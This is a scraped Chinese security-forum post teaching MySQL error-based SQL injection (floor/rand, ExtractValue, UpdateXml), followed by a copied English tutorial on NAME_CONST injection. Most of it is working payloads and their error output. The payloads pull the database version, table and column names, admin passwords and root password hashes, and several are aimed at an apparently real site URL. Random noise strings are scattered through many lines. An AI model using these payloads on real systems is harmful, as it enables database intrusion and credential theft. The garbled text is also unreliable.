找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3146|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
  ~) b! h$ E1 m6 d8 i, [首先进行正常查询:

mysql> select * from article where id = 1;4 q9 x; R! D  m* ]2 k% w( J2 P
+—-+——-+———+5 x4 X8 Z& }0 u0 E' ^5 P4 b3 R
| id | title | content |$ `( q) j6 a2 E/ Q8 Q" x
+—-+——-+———+
* H3 `% v( s8 J, O7 |. a  ?|  1 | test  | do it   |
; _9 s2 v4 ~5 N# B/ l0 L7 u+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
4 E" ]. Q7 U8 j  KERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。; J/ H, n8 w6 T
例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);: J/ D6 u) y; x0 [
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));& u$ M/ Z2 X: Q" `0 p; I1 K
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
& T6 u: G8 `0 g" P测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
) s. J4 `( J7 p6 @& ?2 f  h: a/ kERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’


, o% q+ V+ F0 }" Z7 `  H1 ^+ _( F) K3 m4 H" t$ x+ T" x

再收集:

* z- R6 I. u5 H, ?
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) 0 \4 _9 M* N( q& _( [+ k+ a  T

! M) P* w6 I( ^Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’
) A) u( G" P& ]; ]3 b6 c% W* \- E
: y) Z" y. ]3 [; B# p" xhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)' }  C) \/ b5 }# m

6 d+ J3 G- z  i$ i/ A8 f" h( FErroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ ! y' J. Q/ O5 A1 y6 M
( }! O: ^" r& q; d; A3 t5 [
MYSQL高版本报错注入技巧-利用NAME_CONST注入  A' P( o2 ~9 s# P
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
/ _( |# ^) j# t, t$ H3 p- W% b/ q, u# g* E' \. Y: e  h' Z
2 U+ Y6 @! }% v( W* i
相关信息) |/ h3 \9 D* `% J+ P/ L

) T. f7 R5 l( M" y4 i' `: f' U1 rNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.3 ]+ D  R" v9 n/ H6 {4 m

' c7 \  s0 y4 ]  ^, ]; xCode:  z( w5 ~: E3 X( h" L# c
NAME_CONST(DATA, VALUE)
) {9 c2 }1 G1 S7 S
7 g' R  s+ Z, {: OReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
3 d5 p; @" ^; m4 ]( E5 _9 P+ k6 ]
/ i2 k% }9 p  vSELECT NAME_CONST('TEST', 1)
6 S: o) j- o  E; c0 q9 a$ i# L4 I; {9 L4 ~9 t  X) w

# K) J8 z. X5 Z# y: X0 @! F6 Y  }1 ~8 @  b) i9 A. {
|---------------|7 j; f% W) i0 _# t
|     TEST      |+ a2 Q' }- ?* O4 M
|               |: O  r' [6 V! ^) A
|---------------|2 m7 L% l/ v' ]$ [# v0 a
|       1       |) l" x( f) s4 a/ ?4 R( i8 s4 R
|               |
# s% a9 }  X. ~6 M- F; \3 d* S* w|---------------|$ g! i4 |/ C$ K9 D  A
7 U6 y! h/ e) C2 {4 L

7 ~0 j- ?: _8 l
7 E; W6 Q5 i5 q8 d7 M. E5 _; N
http://dev.mysql.com/doc/refman/5.0/en/m...name-const, ~, Z  G$ D* u* W& z0 L+ s, S
Intro to MySQL Variables5 G# {* M* m1 F5 Q0 M

1 u7 e: P+ z: H: eOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.* H' v: o9 o2 z9 S
& u' D7 t/ M% n' b; T$ d
Code:6 s4 Y7 X/ ?/ q" N/ B+ b
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
7 e8 o- Z1 r; F* Q- ?% Z
+ I% }" J7 A% L7 G2 W

7 t% W" E& m, u; Z6 c5 G8 X% Q; d3 A; ^; U

$ j' N/ b  x3 s0 B) \1 @, w' J
  }( K  W* ?8 O' m0 pCode:
4 m* A8 ?" a( m8 r( l% Q8 O. p$ @0 Tand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
, D! k( u9 v# [7 q$ P2 L" U
6 U& j& k; x8 t
  T+ |& ^, p' o
VAR = Your MySQL variable.
6 l  |  e; Y& L# G- T3 H* K. K! U' l, e3 D( ?  F
MySQL 5.1.3 Server System Variables
7 \0 t8 e7 m- ?9 y& F* N& N. V$ q6 g9 W
Let's try it out on my site..9 O  w' V3 ^5 c# F  E$ d

8 Z9 X' X7 O3 _Code:0 O5 }6 f% {( Z0 `0 a
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
' s7 t" |9 C% O# x  _, J3 ~9 _; R1 S) H' f$ p
Erroruplicate column name '5.0.27-community-nt'
( C; k, t9 h# G, y
9 M/ _% E" @  p! ~* P) r9 r' V
; i; E- Q5 E% K$ C' C9 N9 I
7 }8 V4 a$ q9 q) O4 y$ V
& o) u! K/ T/ k; s! l' i
, p3 b$ Y3 d' S0 j0 ]3 `8 F
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...
; E/ ?8 }9 F9 G9 j; g0 t- n5 m+ }- j
5 U8 o+ n3 }0 @" ?% IData Extraction
; P) r* x' P% x, W* X
$ U/ U5 S0 B! ]: z3 ]( `. w# ^Code:
9 ]* t7 S+ c5 a! A& }! W. u) n+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
6 g+ `8 j- p* u+ y$ g0 O

, k7 T  B$ J2 M1 ]+ f7 w3 E' X! @& E0 M( @6 [& D4 p
We should get a duplicate column 1 error...
9 Q3 C0 [5 v9 u+ z
7 }4 y( Y2 m/ `& I5 E# ?Code:
2 j4 b4 E1 r2 v1 w% khttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--; v( G  g. O) D/ x
) A0 M$ D3 x: O; e& Q
Erroruplicate column name '1/ ^  i! E/ C- n  B1 F) [
) t3 U9 T' K$ R1 L" s" W

- b- V8 L1 t! |8 L% y! {: M* ^0 t  e2 D5 t
) E3 _& V) B* L1 K. Q/ f) j
, `' P7 p9 \7 O$ Y

4 n; t7 x. {& |' t8 N& \Now let's get the tables out this bitch..3 z! v, {5 o& e
+ A" O8 k4 C& |) L# l# c5 f- @
Code:) \& ?& t) ~; K2 s6 [' d' a
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--1 g* v9 r, G& ], g6 F: _7 }4 U* ~
4 c, E5 g& j+ c% G& L" {$ L# l/ b
: G+ y; o  h, @! g; R/ h6 U
Let's see if it works here, if it does, we can go on and finish the job.- ^- o( L$ A6 Y# R4 |: w' A  i
, o5 c  `; v/ m, R$ U
Code:
- n1 ~9 X2 m+ T8 mhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
* x* f* Z; U2 l7 @' y% O! D" o: Q
' X3 ^! I6 a4 r' a. F
0 Q2 \0 u" p& F% c4 NErroruplicate column name 'com_admanage
4 A; U' A5 Y- {- Q" N1 A

9 g  F7 H& i" @* ]
/ P, \+ G3 f1 a2 C- b( Z
* r$ M( v7 P9 D( p5 d: U' O8 `, l; x" a! e# v" e" I$ F
6 N. s+ r: O$ \; L1 [# Z4 O- B

! H$ R" J/ b  iNow I'm going to be lazy and use mysql.user as an example, just for the sake of time./ o4 o$ V! ?. Y0 z3 p  b# g$ j1 r

8 u9 |0 _- H6 f# ILet's get the columns out of the user table..: ?; u/ a+ A% }, f4 {+ H( c7 E' S

) o7 T' V( z+ WCode:
6 R: t3 [" f* J  l1 d+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
4 `, Y6 h8 \; f: S$ c/ Y3 Y/ Z

* n$ k9 {' ?8 J* J# G$ W' Q
: d/ ~( M1 {4 w4 f! ^So mine looks like this, and I get the duplicate column name 'Host'.+ P# A  u0 O# q' H% u

2 b9 I) D7 L2 \- d/ s4 CCode:
% K9 Y% b% ~+ y4 Xhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--/ `9 j0 s$ }$ R+ E& }: j+ G- \

+ q7 f4 e, q& S  Q0 SErroruplicate column name 'Host'! y. P, @- {" l5 C

4 V& X3 e8 v4 K6 x: \4 m6 ]9 c* `) ~! w) f' t( p* v
) Y* N) [) N$ P4 S# z6 N

3 x# s# z% }, Y; e: _

+ t2 @# o; d$ m5 ]
$ U5 x, K: y4 ]3 GWoot, time to finish this bitch off.+ d2 V# w1 `; B0 A1 L9 i. n
3 R$ v; d9 [5 P+ c* U4 S
Code:
/ Z# y* A, ]3 R* p4 ^* d7 E+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--; ]) p! G, r: \3 F% T+ l

7 @, y- N0 ^+ c; e" d9 ]8 L& r- R7 [1 T% c0 i- r0 P& |
So mine looks like this...+ I2 F* w. f" m: L. ]

# i' @# t+ m' I& cCode:
" g( B/ n/ p0 X# K1 R. l4 t5 l( @, Thttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
% p0 D; h; b) A3 q2 [
4 c# c2 h- ^3 N" KErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
  f/ e# o: i8 z2 _% f
+ R1 S1 r$ X3 F' R; ~1 A) Y
- u2 |, X9 F! f5 G# i  h7 N
/ \: ~4 P, p8 K

# F$ \  N. [/ Z/ V( }  M

4 R6 h1 S- I. }. \, p4 u9 ]& d0 w3 d9 U! \# w  `
And there we have it, thanks for reading.

# i$ W, b6 I- k5 f) `( A- i
0 q+ |1 [" ?) o; n/ X/ a6 L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表